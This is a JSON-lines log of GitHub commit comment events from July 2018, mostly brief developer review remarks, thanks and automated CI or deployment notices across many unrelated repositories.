{"id":"7958221570","type":"CommitCommentEvent","actor":{"login":"rishabhdeepsingh"},"repo":{"name":"rishabhdeepsingh/robertalab"},"payload":{"comment":{"id":29689906,"position":1,"line":1,"path":"run.sh","commit_id":"a0614258f8d56cdefb9d7546482833945b756f19","created_at":"2018-07-12T19:22:52Z","updated_at":"2018-07-12T19:22:52Z","author_association":"OWNER","body":"My bad"}},"created_at":"2018-07-12T19:22:52Z"}
{"id":"7958222423","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29689909,"position":null,"line":null,"path":null,"commit_id":"579e3a778a67100feb55fb68d52a0f34089dd181","created_at":"2018-07-12T19:23:04Z","updated_at":"2018-07-12T19:23:04Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-470](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-470).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-470-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-12T19:23:04Z"}
{"id":"7958222873","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29689911,"position":null,"line":null,"path":null,"commit_id":"302073f43c74a27e652951581ef5092e2a90c0b2","created_at":"2018-07-12T19:23:10Z","updated_at":"2018-07-12T19:23:10Z","author_association":"NONE","body":"## Global\n\n| Changed            |   Status |\n|:-------------------|---------:|\n| `coverage`         |     0.03 |\n| `metadata_passing` |     1    |\n| `nodes_count`      |   688    |\n| `texts_passing`    |     1    |\n\n## Words\n\n| Changed   |   Status |\n|:----------|---------:|\n| `grc`     |   +19758 |\n\n## Units\n\n| Changed                                                 | Status   |\n|:--------------------------------------------------------|:---------|\n| `./data/tlg0561/tlg001/tlg0561.tlg001.perseus-grc1.xml` | Deleted  |\n| `./data/tlg0561/tlg001/tlg0561.tlg001.perseus-grc2.xml` | New      |\n| `./data/tlg0561/tlg001/__cts__.xml`                     | Passing  |\n| `./data/tlg0561/tlg001/tlg0561.tlg001.perseus-grc2.xml` | Passing  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4444)*\n"}},"created_at":"2018-07-12T19:23:10Z"}
{"id":"7958223367","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29689912,"position":null,"line":null,"path":null,"commit_id":"b08d637ddd77e1bc845ec64eb6d06dbe6b478774","created_at":"2018-07-12T19:23:17Z","updated_at":"2018-07-12T19:23:17Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-192316 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-192316\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T19:23:17Z"}
{"id":"7958224889","type":"CommitCommentEvent","actor":{"login":"rishabhdeepsingh"},"repo":{"name":"rishabhdeepsingh/robertalab"},"payload":{"comment":{"id":29689916,"position":6,"line":172,"path":"OpenRobertaParent/OpenRobertaServer/src/main/resources/create-tables.sql","commit_id":"a0614258f8d56cdefb9d7546482833945b756f19","created_at":"2018-07-12T19:23:37Z","updated_at":"2018-07-12T19:23:37Z","author_association":"OWNER","body":"Then what should i add?"}},"created_at":"2018-07-12T19:23:37Z"}
{"id":"7958248559","type":"CommitCommentEvent","actor":{"login":"intrepidOlivia"},"repo":{"name":"conor-cafferkey-sociomantic/enzyme"},"payload":{"comment":{"id":29689958,"position":null,"line":null,"path":null,"commit_id":"670a88cb7bf539008258f78937e36174805083cb","created_at":"2018-07-12T19:28:45Z","updated_at":"2018-07-12T19:28:45Z","author_association":"NONE","body":"Hey, are you going to submit a PR for these changes? They are still present in the origin repo's documentation."}},"created_at":"2018-07-12T19:28:45Z"}
{"id":"7958250577","type":"CommitCommentEvent","actor":{"login":"dhelden"},"repo":{"name":"APN-Pucky/tyrant_optimize"},"payload":{"comment":{"id":29689965,"position":null,"line":null,"path":null,"commit_id":"684553bc7a95506fcbb4ae8ee217fce8e0dbb1cc","created_at":"2018-07-12T19:29:11Z","updated_at":"2018-07-12T19:29:11Z","author_association":"NONE","body":"no strike but rally all !?!?!?"}},"created_at":"2018-07-12T19:29:11Z"}
{"id":"7958251740","type":"CommitCommentEvent","actor":{"login":"andpalmer98"},"repo":{"name":"andpalmer98/L.maackii"},"payload":{"comment":{"id":29689970,"position":null,"line":null,"path":null,"commit_id":"b35b4976b2fadf6708e9667ce62ed595692743ce","created_at":"2018-07-12T19:29:26Z","updated_at":"2018-07-12T19:29:26Z","author_association":"OWNER","body":"Finished all New World points"}},"created_at":"2018-07-12T19:29:26Z"}
{"id":"7958256364","type":"CommitCommentEvent","actor":{"login":"varkor"},"repo":{"name":"varkor/rust"},"payload":{"comment":{"id":29689985,"position":null,"line":null,"path":null,"commit_id":"6425ef9ded687fb1fd22bb13bbb247d6f0b771cd","created_at":"2018-07-12T19:30:26Z","updated_at":"2018-07-12T19:30:26Z","author_association":"OWNER","body":"Whoops, didn't even think about this when reordering it, thanks!"}},"created_at":"2018-07-12T19:30:26Z"}
{"id":"7958266939","type":"CommitCommentEvent","actor":{"login":"refaimustapha"},"repo":{"name":"refai-mustapha/hello--world"},"payload":{"comment":{"id":29690011,"position":null,"line":null,"path":null,"commit_id":"fed6ab961fe01d9de15df3713d846dba9ab86b74","created_at":"2018-07-12T19:32:43Z","updated_at":"2018-07-12T19:32:43Z","author_association":"CONTRIBUTOR","body":"refai"}},"created_at":"2018-07-12T19:32:43Z"}
{"id":"7958269655","type":"CommitCommentEvent","actor":{"login":"ppekrol"},"repo":{"name":"ravendb/jint"},"payload":{"comment":{"id":29690020,"position":13,"line":68,"path":"Jint/Runtime/JavaScriptException.cs","commit_id":"b9c5028911e853c9eb23140ee65d82fc873c24d8","created_at":"2018-07-12T19:33:19Z","updated_at":"2018-07-12T19:33:19Z","author_association":"MEMBER","body":"I understand, but now the location of an error in the test that is failing in very different. We might be missing a case. Do you remember what was it? If not we probably should revert this or add it only if 'Location' is null."}},"created_at":"2018-07-12T19:33:19Z"}
{"id":"7958272227","type":"CommitCommentEvent","actor":{"login":"vinisbranco"},"repo":{"name":"vinisbranco/ProjetoBlockchain"},"payload":{"comment":{"id":29690026,"position":null,"line":null,"path":null,"commit_id":"8de8335e66e33a03cc63b043bc01837cccbbce70","created_at":"2018-07-12T19:33:52Z","updated_at":"2018-07-12T19:33:52Z","author_association":"OWNER","body":"Esta com bug para adicionar mais de um Participante e também para mais de um participante dar um lance"}},"created_at":"2018-07-12T19:33:52Z"}
{"id":"7958273159","type":"CommitCommentEvent","actor":{"login":"breed"},"repo":{"name":"kohler/hotcrp"},"payload":{"comment":{"id":29690031,"position":null,"line":null,"path":null,"commit_id":"bbf08a64a68503db639b21bc716a996da8dc3325","created_at":"2018-07-12T19:34:05Z","updated_at":"2018-07-12T19:34:05Z","author_association":"NONE","body":"you are my hero!"}},"created_at":"2018-07-12T19:34:05Z"}
{"id":"7958280107","type":"CommitCommentEvent","actor":{"login":"vondele"},"repo":{"name":"vondele/Stockfish"},"payload":{"comment":{"id":29690041,"position":null,"line":null,"path":null,"commit_id":"fbbc57c77902059c82393feb6ad5cb431666490e","created_at":"2018-07-12T19:35:35Z","updated_at":"2018-07-12T19:35:35Z","author_association":"OWNER","body":"@noobpwnftw seems like timeouts have become pretty bad again."}},"created_at":"2018-07-12T19:35:35Z"}
{"id":"7958280166","type":"CommitCommentEvent","actor":{"login":"saintx"},"repo":{"name":"markwoodhall/marge"},"payload":{"comment":{"id":29690042,"position":null,"line":null,"path":null,"commit_id":"635b7e43cd67ac7059cc54ac08c408f0c9a7eef3","created_at":"2018-07-12T19:35:36Z","updated_at":"2018-07-12T19:35:36Z","author_association":"NONE","body":"Thank you very much for this!"}},"created_at":"2018-07-12T19:35:36Z"}
{"id":"7958286196","type":"CommitCommentEvent","actor":{"login":"Bertolius"},"repo":{"name":"ControlEverythingCommunity/SI7021"},"payload":{"comment":{"id":29690052,"position":null,"line":null,"path":null,"commit_id":"988884ac1e5c4bf05874dfd3ec2b29c98df3d8bb","created_at":"2018-07-12T19:36:53Z","updated_at":"2018-07-12T19:36:53Z","author_association":"NONE","body":"Awesome!  Glad I asked.  Thanks for the heads up."}},"created_at":"2018-07-12T19:36:53Z"}
{"id":"7958291655","type":"CommitCommentEvent","actor":{"login":"BrianCharapata"},"repo":{"name":"BrianCharapata/learn-github"},"payload":{"comment":{"id":29690065,"position":1,"line":1,"path":"README.md","commit_id":"09756fb909fdc93475be6506c91e660fae3ddea2","created_at":"2018-07-12T19:38:03Z","updated_at":"2018-07-12T19:38:03Z","author_association":"OWNER","body":"I'm adding another boring sentence."}},"created_at":"2018-07-12T19:38:03Z"}
{"id":"7958297201","type":"CommitCommentEvent","actor":{"login":"Theverat"},"repo":{"name":"LuxCoreRender/BlendLuxCore"},"payload":{"comment":{"id":29690092,"position":null,"line":null,"path":null,"commit_id":"223fdcbc3430230fcb597aa64758ae67cdb03097","created_at":"2018-07-12T19:39:15Z","updated_at":"2018-07-12T19:39:15Z","author_association":"MEMBER","body":"this commit addresses #188 "}},"created_at":"2018-07-12T19:39:15Z"}
{"id":"7958299572","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29690098,"position":null,"line":null,"path":null,"commit_id":"1a0d274927c2bb06b414438f8ab1a48ac8dbe4bd","created_at":"2018-07-12T19:39:47Z","updated_at":"2018-07-12T19:39:47Z","author_association":"NONE","body":"issue_6736 (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2973 of 2973 tests passed, 117 test warnings)\n\nMessages:\n\n * 100 tests had: AUD diffs.\n * 2 tests had: ERR diffs.\n * 16 tests had: Table small diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a0d274927c2bb06b414438f8ab1a48ac8dbe4bd-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a0d274927c2bb06b414438f8ab1a48ac8dbe4bd-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-12T19:39:47Z"}
{"id":"7958301735","type":"CommitCommentEvent","actor":{"login":"MicroshaftCorp"},"repo":{"name":"elfmaster/skeksi_virus"},"payload":{"comment":{"id":29690103,"position":null,"line":null,"path":null,"commit_id":"0d0da6fb1a8785460f93d2187e8068de18d5d4da","created_at":"2018-07-12T19:40:16Z","updated_at":"2018-07-12T19:40:16Z","author_association":"NONE","body":"What's This?"}},"created_at":"2018-07-12T19:40:16Z"}
{"id":"7958302636","type":"CommitCommentEvent","actor":{"login":"jasonwbarnett"},"repo":{"name":"jasonwbarnett/jsonfs"},"payload":{"comment":{"id":29690105,"position":48,"line":43,"path":"fs.go","commit_id":"7a6383a98b6a87ea0130a13d14f2c930ac420ae9","created_at":"2018-07-12T19:40:27Z","updated_at":"2018-07-12T19:40:27Z","author_association":"OWNER","body":"I don't want to modify parts of the standard library. This was directly copied from http, but it was originally a private var in another file."}},"created_at":"2018-07-12T19:40:27Z"}
{"id":"7958307375","type":"CommitCommentEvent","actor":{"login":"billyvg"},"repo":{"name":"getsentry/sentry"},"payload":{"comment":{"id":29690112,"position":14,"line":30,"path":"src/sentry/static/sentry/app/components/errorBoundary.jsx","commit_id":"3e69aff0787e8e05ee8a2478f710d4bf2ba152d8","created_at":"2018-07-12T19:41:33Z","updated_at":"2018-07-12T19:41:33Z","author_association":"MEMBER","body":"❌"}},"created_at":"2018-07-12T19:41:33Z"}
{"id":"7958311462","type":"CommitCommentEvent","actor":{"login":"gtkatakura-bysoft"},"repo":{"name":"jasonrobson/todolist"},"payload":{"comment":{"id":29690123,"position":37,"line":20,"path":"src/Orders.js","commit_id":"bca2c959a936a2e29099f6cd7b00cc879ad91be7","created_at":"2018-07-12T19:42:28Z","updated_at":"2018-07-12T19:42:28Z","author_association":"COLLABORATOR","body":"Usar o `Consumer` dentro do `map` vai causar perda de performance. O adequado é que o `Consumer` seja movido na estrutura para cima do `map`."}},"created_at":"2018-07-12T19:42:28Z"}
{"id":"7958314839","type":"CommitCommentEvent","actor":{"login":"evert"},"repo":{"name":"evert/evert.github.com"},"payload":{"comment":{"id":29690130,"position":null,"line":null,"path":null,"commit_id":"99b7eb07454ad61e39199d17592a962f355c7453","created_at":"2018-07-12T19:43:12Z","updated_at":"2018-07-12T19:43:12Z","author_association":"OWNER","body":"Not really sure if I feel like going back there =) you can always leave a comment if you feel like it's really missing"}},"created_at":"2018-07-12T19:43:12Z"}
{"id":"7958315206","type":"CommitCommentEvent","actor":{"login":"gtkatakura-bysoft"},"repo":{"name":"jasonrobson/todolist"},"payload":{"comment":{"id":29690131,"position":18,"line":62,"path":"src/App.js","commit_id":"bca2c959a936a2e29099f6cd7b00cc879ad91be7","created_at":"2018-07-12T19:43:16Z","updated_at":"2018-07-12T19:43:16Z","author_association":"COLLABORATOR","body":"A ideia do `Context Api` é justamente permitir a remoção desses tipos de controle como esse `onChange`, não faz sentido aplicar o `Context Api` se não remover esses controles de estado manual."}},"created_at":"2018-07-12T19:43:16Z"}
{"id":"7958318068","type":"CommitCommentEvent","actor":{"login":"yeltnar"},"repo":{"name":"yeltnar/ws-expose-server"},"payload":{"comment":{"id":29690137,"position":null,"line":null,"path":null,"commit_id":"46751071a9907050bb2b44c8b2ec9d0bfb41a87f","created_at":"2018-07-12T19:43:53Z","updated_at":"2018-07-12T19:43:53Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/8839f9f8-ee5d-429f-8749-52267c653952?env_id=ibm%3Ayp%3Aus-south \"ws-expose\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/5c41e84d-5968-4649-8c7b-52afb41b0a6e?env_id=ibm%3Ayp%3Aus-south \"ws-expose-pipeline\") deployed [ws-expose-server](https://github.com/yeltnar/ws-expose-server/releases/tag/deploy-ibm-yp-us-south-andcbrant-gmail.com-dev-20180712-194353 \"deploy-ibm-yp-us-south-andcbrant-gmail.com-dev-20180712-194353\") to [dev](https://console.bluemix.net/apps/e68f5516-a561-42c7-ac49-af54fea27ed3?env_id=ibm:yp:us-south \"ibm:yp:us-south:andcbrant@gmail.com:dev\"), including this commit"}},"created_at":"2018-07-12T19:43:53Z"}
{"id":"7958321643","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29690146,"position":null,"line":null,"path":null,"commit_id":"1a0d274927c2bb06b414438f8ab1a48ac8dbe4bd","created_at":"2018-07-12T19:44:42Z","updated_at":"2018-07-12T19:44:42Z","author_association":"NONE","body":"issue_6736 (mbadams5) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a0d274927c2bb06b414438f8ab1a48ac8dbe4bd-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-12T19:44:42Z"}
{"id":"7958326051","type":"CommitCommentEvent","actor":{"login":"Yasnaret"},"repo":{"name":"Yasnaret/scl-2018-05-bc-core-pm-socialnetwork"},"payload":{"comment":{"id":29690157,"position":null,"line":null,"path":null,"commit_id":"406846e299ace3e6d2c8444fdcbb89351916bebd","created_at":"2018-07-12T19:45:39Z","updated_at":"2018-07-12T19:45:39Z","author_association":"OWNER","body":"Se cambio para no generar conflictos nombres de archivos index.html y estilos.css a main.html y main.css respectivamente\r\n"}},"created_at":"2018-07-12T19:45:39Z"}
{"id":"7958326266","type":"CommitCommentEvent","actor":{"login":"gtkatakura-bysoft"},"repo":{"name":"jasonrobson/todolist"},"payload":{"comment":{"id":29690159,"position":18,"line":62,"path":"src/App.js","commit_id":"bca2c959a936a2e29099f6cd7b00cc879ad91be7","created_at":"2018-07-12T19:45:42Z","updated_at":"2018-07-12T19:45:42Z","author_association":"COLLABORATOR","body":"Acabei de olhar esse [commit](https://github.com/jasonrobson/todolist/commit/bd71d7f024e97867b1ffa9e93e0ec2c9bb41f2f5), que corrige a situação que acabei de falar."}},"created_at":"2018-07-12T19:45:42Z"}
{"id":"7958329183","type":"CommitCommentEvent","actor":{"login":"mohamedmess"},"repo":{"name":"mohamedmess/Job_Offers_Website"},"payload":{"comment":{"id":29690164,"position":null,"line":null,"path":null,"commit_id":"e52661ba220e34461d754f498600f61a2a835bb1","created_at":"2018-07-12T19:46:19Z","updated_at":"2018-07-12T19:46:19Z","author_association":"OWNER","body":"In this commit, I revealed all of the categories by sent them over HomeController/Index() to View. This View are the Index.cshtml in Views/Home directory.\r\nIn Index.cshtml page, I retrieved all of the categories and I show them one by one. Under each category, I retrieved all related Jobs and I showed them in panel."}},"created_at":"2018-07-12T19:46:19Z"}
{"id":"7958332723","type":"CommitCommentEvent","actor":{"login":"dborstelmann"},"repo":{"name":"SlalomSTLHealthcare/healthcare-web"},"payload":{"comment":{"id":29690171,"position":null,"line":null,"path":null,"commit_id":"6b921495a0e1001f7d9fc8c5f01bc517d491844d","created_at":"2018-07-12T19:47:07Z","updated_at":"2018-07-12T19:47:07Z","author_association":"CONTRIBUTOR","body":"BAE"}},"created_at":"2018-07-12T19:47:07Z"}
{"id":"7958337103","type":"CommitCommentEvent","actor":{"login":"aaronwaudio"},"repo":{"name":"aaronwaudio/website"},"payload":{"comment":{"id":29690178,"position":1,"line":1,"path":"lipsum.txt","commit_id":"fda89a2f51d3913946891408680031de500e5c0b","created_at":"2018-07-12T19:48:05Z","updated_at":"2018-07-12T19:48:05Z","author_association":"OWNER","body":"### Lipsom Really?\r\nso we really weren't able to find any better filler text?"}},"created_at":"2018-07-12T19:48:05Z"}
{"id":"7958338463","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29690182,"position":23,"line":23,"path":"Homework #5/Homework5.java","commit_id":"c29d445027ee8fc5dd0a90a466d99b2d56db06ec","created_at":"2018-07-12T19:48:22Z","updated_at":"2018-07-12T19:48:22Z","author_association":"OWNER","body":"який буде результат, якщо перших чотири числа будуть від'ємні, а п'яте додатнє?"}},"created_at":"2018-07-12T19:48:22Z"}
{"id":"7958338590","type":"CommitCommentEvent","actor":{"login":"gtkatakura-bysoft"},"repo":{"name":"jasonrobson/todolist"},"payload":{"comment":{"id":29690183,"position":30,"line":30,"path":"src/Filters.js","commit_id":"bd71d7f024e97867b1ffa9e93e0ec2c9bb41f2f5","created_at":"2018-07-12T19:48:24Z","updated_at":"2018-07-12T19:48:24Z","author_association":"COLLABORATOR","body":"Esse `currentFilter` não está sendo utilizado."}},"created_at":"2018-07-12T19:48:24Z"}
{"id":"7958341161","type":"CommitCommentEvent","actor":{"login":"Code-Conjurer"},"repo":{"name":"Code-Conjurer/Code-Challenges-"},"payload":{"comment":{"id":29690189,"position":null,"line":null,"path":null,"commit_id":"b7dfa907c7266f3e46a31ac959669158af8310d6","created_at":"2018-07-12T19:49:00Z","updated_at":"2018-07-12T19:49:00Z","author_association":"OWNER","body":"also added 'a' and 'i' to the dictionary text file, as well as other small changes to make the code easier to navigate "}},"created_at":"2018-07-12T19:49:00Z"}
{"id":"7958342282","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29690191,"position":null,"line":null,"path":null,"commit_id":"832d58880588a74c3ca4612a6110e9d78cbbf978","created_at":"2018-07-12T19:49:15Z","updated_at":"2018-07-12T19:49:15Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-194914 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-194914\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T19:49:15Z"}
{"id":"7958342509","type":"CommitCommentEvent","actor":{"login":"emilberwald"},"repo":{"name":"emilberwald/mathematics"},"payload":{"comment":{"id":29690192,"position":49,"line":49,"path":"src/mathematics/algebra/clifford.py","commit_id":"7c71f9dfe157e61c9bd9190e717494184ca264d6","created_at":"2018-07-12T19:49:18Z","updated_at":"2018-07-12T19:49:18Z","author_association":"OWNER","body":"Forgot return statement"}},"created_at":"2018-07-12T19:49:18Z"}
{"id":"7958346216","type":"CommitCommentEvent","actor":{"login":"gtkatakura-bysoft"},"repo":{"name":"jasonrobson/todolist"},"payload":{"comment":{"id":29690203,"position":30,"line":22,"path":"src/App.js","commit_id":"bd71d7f024e97867b1ffa9e93e0ec2c9bb41f2f5","created_at":"2018-07-12T19:50:08Z","updated_at":"2018-07-12T19:50:08Z","author_association":"COLLABORATOR","body":"O adequado seria isolar esse comportamento para um componente para controle de estados de `Orders`, poderia ser chamado `OrderProvider`."}},"created_at":"2018-07-12T19:50:08Z"}
{"id":"7958348077","type":"CommitCommentEvent","actor":{"login":"gtkatakura-bysoft"},"repo":{"name":"jasonrobson/todolist"},"payload":{"comment":{"id":29690207,"position":36,"line":28,"path":"src/App.js","commit_id":"bd71d7f024e97867b1ffa9e93e0ec2c9bb41f2f5","created_at":"2018-07-12T19:50:30Z","updated_at":"2018-07-12T19:50:30Z","author_association":"COLLABORATOR","body":"O adequado seria isolar esse comportamento para um componente para controle de estados de `Orders`, poderia ser chamado `TodosProvider`."}},"created_at":"2018-07-12T19:50:30Z"}
{"id":"7958348514","type":"CommitCommentEvent","actor":{"login":"olivergierke"},"repo":{"name":"spring-projects/spring-data-elasticsearch"},"payload":{"comment":{"id":29690208,"position":28,"line":93,"path":"src/main/java/org/springframework/data/elasticsearch/client/TransportClientFactoryBean.java","commit_id":"d66b2a6f639af426b23f3a4f328505129ab15231","created_at":"2018-07-12T19:50:36Z","updated_at":"2018-07-12T19:50:36Z","author_association":"MEMBER","body":"I'm sorry this slipped through. Should be fixed with 4694553 which also finally adds unit tests around the parsing logic."}},"created_at":"2018-07-12T19:50:36Z"}
{"id":"7958349300","type":"CommitCommentEvent","actor":{"login":"MJZ1977"},"repo":{"name":"MJZ1977/Stockfish"},"payload":{"comment":{"id":29690210,"position":null,"line":null,"path":null,"commit_id":"ab6a39499ce969607b9e49b3de32d2235c4654a8","created_at":"2018-07-12T19:50:46Z","updated_at":"2018-07-12T19:50:46Z","author_association":"OWNER","body":"Thank you all for your advices. I will try to fix them quickly.\r\n\r\nIn fact, I think that queen position is important only if opponent is attacking with its queen. It is not the exact behavior as with KingProtector which is a general bonus. I will fix the bugs and see if we can have something better."}},"created_at":"2018-07-12T19:50:46Z"}
{"id":"7958349416","type":"CommitCommentEvent","actor":{"login":"gtkatakura-bysoft"},"repo":{"name":"jasonrobson/todolist"},"payload":{"comment":{"id":29690211,"position":51,"line":43,"path":"src/App.js","commit_id":"bd71d7f024e97867b1ffa9e93e0ec2c9bb41f2f5","created_at":"2018-07-12T19:50:47Z","updated_at":"2018-07-12T19:50:47Z","author_association":"COLLABORATOR","body":"O adequado seria isolar esse comportamento para um componente para controle de estados de `Orders`, poderia ser chamado `FilterProvider`."}},"created_at":"2018-07-12T19:50:47Z"}
{"id":"7958355109","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29690227,"position":null,"line":null,"path":null,"commit_id":"1f6338b341ed8fede87b68a76e9126347b0154e2","created_at":"2018-07-12T19:51:58Z","updated_at":"2018-07-12T19:51:58Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [updatersyn](https://updatersyn-static-docs.pantheonsite.io/docs) Multidev environment:\n- [scripts/deploy-multidev.sh](https://github.com/pantheon-systems/documentation/commit/1f6338b341ed8fede87b68a76e9126347b0154e2/scripts/deploy-multidev.sh)\n- [scripts/manual-deploy.sh](https://github.com/pantheon-systems/documentation/commit/1f6338b341ed8fede87b68a76e9126347b0154e2/scripts/manual-deploy.sh)\n"}},"created_at":"2018-07-12T19:51:58Z"}
{"id":"7958356227","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29690232,"position":3,"line":3,"path":"Homework #4/Dog.java","commit_id":"684c9dc7d9a753ab3eec3899501eea9b58705029","created_at":"2018-07-12T19:52:12Z","updated_at":"2018-07-12T19:52:12Z","author_association":"OWNER","body":"для цього поля треба було зробити enum"}},"created_at":"2018-07-12T19:52:12Z"}
{"id":"7958362542","type":"CommitCommentEvent","actor":{"login":"mhei"},"repo":{"name":"openwrt/packages"},"payload":{"comment":{"id":29690240,"position":null,"line":null,"path":null,"commit_id":"f6e06384f1c5aca396ec65a70ec94837f1c133a8","created_at":"2018-07-12T19:53:33Z","updated_at":"2018-07-12T19:53:33Z","author_association":"MEMBER","body":"Strange. Then please append your .config (or send it per PM) and tell me your commit ids of OpenWrt and package feed - I'll try to reproduce it here..."}},"created_at":"2018-07-12T19:53:33Z"}
{"id":"7958365216","type":"CommitCommentEvent","actor":{"login":"Ming-Tang"},"repo":{"name":"monacoinproject/monacoin"},"payload":{"comment":{"id":29690245,"position":null,"line":null,"path":null,"commit_id":"341db5e83f2dea0c5cf3dbc0421201efa09a1625","created_at":"2018-07-12T19:54:04Z","updated_at":"2018-07-12T19:54:04Z","author_association":"NONE","body":"I have investigated decentralized methods to place checkpoints on blockchains.\r\nOne way is to submit checkpoints on another blockchain (that is protected by greater hashpower, such as Bitcoin).\r\n\r\nThis allows newly-started nodes to figure out which chain is the correct one, unlike simple \"reorg depth limits\".\r\n\r\n----\r\n\r\nKomodo is a blockchain that places their checkpoints on Bitcoin chain (called notarization), and also supports other chains to be notarized as well. Komodo notary nodes are elected by stake-based voting.\r\n\r\nGameCredits integrated with Komodo notarization after suffering a double spending attack:\r\nhttps://medium.com/gamecredits/gamecredits-network-update-0-15-2-komodo-integration-d6eda64ea368\r\n\r\n----\r\n\r\nI am also attempting to develop a cross-chain checkpointing protocol.\r\n\r\nIt will be a totally separate program that syncs checkpoints from another chain (\"parent chain\"), and it will place Monacoin checkpoints using the `volatilecheckpoint` RPC.\r\n\r\nUnlike Komodo, it can allow anyone to vote for checkpoints on the \"parent chain\".\r\n"}},"created_at":"2018-07-12T19:54:04Z"}
{"id":"7958366670","type":"CommitCommentEvent","actor":{"login":"msarboleda"},"repo":{"name":"msarboleda/evpiu_dvlp"},"payload":{"comment":{"id":29690248,"position":null,"line":null,"path":null,"commit_id":"00f1213152149d818f5f51c9d554f4713f427257","created_at":"2018-07-12T19:54:22Z","updated_at":"2018-07-12T19:54:22Z","author_association":"OWNER","body":"El primer archivo de este commit no debía de commitearse en este punto, ocurrió un error con esto."}},"created_at":"2018-07-12T19:54:22Z"}
{"id":"7958367920","type":"CommitCommentEvent","actor":{"login":"HazAT"},"repo":{"name":"getsentry/sentry"},"payload":{"comment":{"id":29690253,"position":14,"line":30,"path":"src/sentry/static/sentry/app/components/errorBoundary.jsx","commit_id":"3e69aff0787e8e05ee8a2478f710d4bf2ba152d8","created_at":"2018-07-12T19:54:38Z","updated_at":"2018-07-12T19:54:38Z","author_association":"MEMBER","body":"🙈 \r\nhttps://media.giphy.com/media/HiBNkOKRhBJew/giphy.gif"}},"created_at":"2018-07-12T19:54:38Z"}
